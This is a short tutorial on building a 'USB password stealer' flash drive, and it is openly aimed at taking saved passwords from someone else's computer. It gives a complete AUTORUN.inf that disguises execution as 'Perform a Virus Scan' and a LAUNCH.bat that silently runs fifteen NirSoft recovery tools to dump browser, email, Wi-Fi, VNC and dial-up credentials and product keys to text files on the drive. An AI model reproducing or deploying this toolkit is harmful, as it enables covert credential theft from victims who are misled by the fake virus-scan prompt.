USB Password Stealer


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This tutorial will walk you through setting up a USB flash drive to steal the saved passwords on a computer. If you're looking for a super tiny, super discreet flash drive, we recommend SanDisk Cruzer Fit CZ33 64GB USB 2.0 Low-Profile Flash Drive- SDCZ33-064G-B35
  1.  open notepad/wordpad

    type:

    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan

    save this as AUTORUN.inf
  2. open a new notepad/wordpad document

    type:

    start mspass.exe /stext mspass.txt

    start mailpv.exe /stext mailpv.txt

    start iepv.exe /stext iepv.txt

    start pspv.exe /stext pspv.txt

    start PasswordFox.exe /stext passwordfox.txt

    start OperaPassView.exe /stext OperaPassView.txt

    start ChromePass.exe /stext ChromePass.txt

    start Dialupass.exe /stext Dialupass.txt

    start netpass.exe /stext netpass.txt

    start WirelessKeyView.exe /stext WirelessKeyView.txt

    start BulletsPassView.exe /stext BulletsPassView.txt

    start VNCPassView.exe /stext VNCPassView.txt

    start OpenedFilesView.exe /stext OpenedFilesView.txt

    start ProduKey.exe /stext ProduKey.txt

    start USBDeview.exe /stext USBDeview.txt


    save this as LAUNCH.bat
  3. copy the autorun and launch file to your USB
  4. go to http://www.nirsoft.net/ and download the programs named in step 2
  5. extract the files you downloaded to your desktop and copy all the .exe files to your USB
  6. remove and re-insert your USB
  7. click on the option perform a virus scan
    (this is an exemple, if you want it to say something else go to the autorun file and change it ;) )
  8. go to my computer---> USB DRIVE and open it


    you will now see some text files, if you open them you will see usernames and passwords


    NOTICE: this only recovers passwords that have once been saved on your computer
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